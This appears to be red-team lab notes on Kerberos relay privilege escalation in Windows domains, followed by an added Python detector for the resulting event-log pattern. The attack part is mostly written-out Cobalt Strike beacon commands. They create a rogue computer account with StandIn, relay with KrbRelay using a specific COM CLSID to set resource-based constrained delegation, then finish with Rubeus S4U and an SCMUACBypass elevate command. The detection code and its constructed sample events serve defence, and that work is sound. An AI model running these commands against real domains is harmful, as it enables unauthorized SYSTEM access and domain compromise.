Attack Overview

Goal: Local privilege escalation on TargetComputer

  • Start an RPC listener
  • Coerce a COM server to authenticate over Kerberos and obtain a service ticket for HOST/TargetComputer
  • Relay the ticket to LDAP/TargetComputer, then use the relevant techniques (RBCD, shadow credentials attack) to modify the computer account object and achieve local privilege escalation.

SMB signing

This attack does not work if SMB signing is required (it is enabled but not required by default, except on DCs; it became required in Windows Insider builds, e.g., Windows 11 & Server).

Tools

  • C2: Cobalt Strike
  • Relaying: KrbRelay, KrbRelayUp (can automate everything; not covered here)
  • LPE: StandIn, Whisker, Rubeus

Add set tasks_max_size "2097152"; to the top of the Malleable C2 profile (the KrbRelay assembly exceeds the default task size).

Use StandIn to create a computer account:

beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make
# Record the objectSid and save it in $computer_sid
beacon> powershell Get-DomainComputer -Identity EvilComputer -Properties objectsid

Run KrbRelay against the target SPN:

# Note down the allowed port for the OXID resolver and save it in $allowed_port
beacon> execute-assembly C:\Tools\KrbRelay\CheckPort\bin\Release\CheckPort.exe
# Run KrbRelay and configure RBCD
# note: the CLSID is a COM server that authenticates at RPC_C_IMP_LEVEL_IMPERSONATE
beacon> execute-assembly C:\Tools\KrbRelay\KrbRelay\bin\Release\KrbRelay.exe -spn $ldap_spn -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd $computer_sid -port $allowed_port

The command above makes changes through LDAP that allow the dummy computer (EvilComputer) to use RBCD against the target. Get a ticket for HOST/TargetComputer through RBCD (e.g. Rubeus.exe asktgt, then Rubeus.exe s4u).

Use SCMUACBypass to achieve local privilege escalation with this ticket. For RTO lab purposes, this is available through the elevate svc-exe-krb [listener-name] command (found in C:\Tools\SCMUACBypass).
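A defensive counterpart to the procedure above, added here and not part of the original notes: the relay leaves a pattern in the Security log, a 4741 computer-account creation followed by a 5136 write of msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer, performed by the target's own account and granting the new computer's SID. The event records below are constructed and simplified; the field names, SIDs and timestamps are assumptions, not real log output.

```python
import re
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
SID_RE = re.compile(r"S-1-5-21(?:-\d+){4}")

# Constructed sample records (not real logs): a reduced view of the fields that
# Security events 4741 (computer account created) and 5136 (directory service
# object modified) carry. The 5136 "value" is the SDDL form of the security
# descriptor written to the RBCD attribute; the SIDs here are made up.
SAMPLE_EVENTS = [
    {"id": 4741, "time": "2024-01-10T10:00:00", "subject": "CORP\\jdoe",
     "object": "CN=EvilComputer,CN=Computers,DC=corp,DC=local",
     "new_sid": "S-1-5-21-1111-2222-3333-1108"},
    {"id": 5136, "time": "2024-01-10T10:01:00", "subject": "CORP\\admin",
     "object": "CN=FileSrv,CN=Computers,DC=corp,DC=local",
     "attribute": "description", "operation": "Value Added", "value": "file server"},
    {"id": 5136, "time": "2024-01-10T10:02:30", "subject": "CORP\\TARGETCOMPUTER$",
     "object": "CN=TargetComputer,CN=Computers,DC=corp,DC=local",
     "attribute": RBCD_ATTR, "operation": "Value Added",
     "value": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111-2222-3333-1108)"},
]

def object_account(dn):
    """Derive the sAMAccountName form (NAME$) of a computer object's DN."""
    return dn.split(",")[0].removeprefix("CN=").upper() + "$"

def find_rbcd_abuse(events, window=timedelta(hours=1)):
    """Flag RBCD attribute writes matching the relay pattern: the target computer
    writes its own attribute, and/or the SDDL grants a computer account created
    within `window` before the write. Returns one dict per suspicious write."""
    created = {}  # sid -> (creator, creation time)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4741:
            created[ev["new_sid"]] = (ev["subject"], t)
            continue
        if ev["id"] != 5136 or ev.get("attribute") != RBCD_ATTR or ev["operation"] != "Value Added":
            continue
        reasons = []
        if ev["subject"].split("\\")[-1].upper() == object_account(ev["object"]):
            reasons.append("self-write by target computer account (relayed authentication)")
        for sid in SID_RE.findall(ev["value"]):
            if sid in created and t - created[sid][1] <= window:
                reasons.append(f"grants {sid}, created {created[sid][1]} by {created[sid][0]}")
        if reasons:
            alerts.append({"time": ev["time"], "object": ev["object"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in find_rbcd_abuse(SAMPLE_EVENTS):
        print(a["time"], a["object"], "; ".join(a["reasons"]))
```

Event 4741 also shows which user created the account, so the same logic can feed an alert on MachineAccountQuota use by non-administrators.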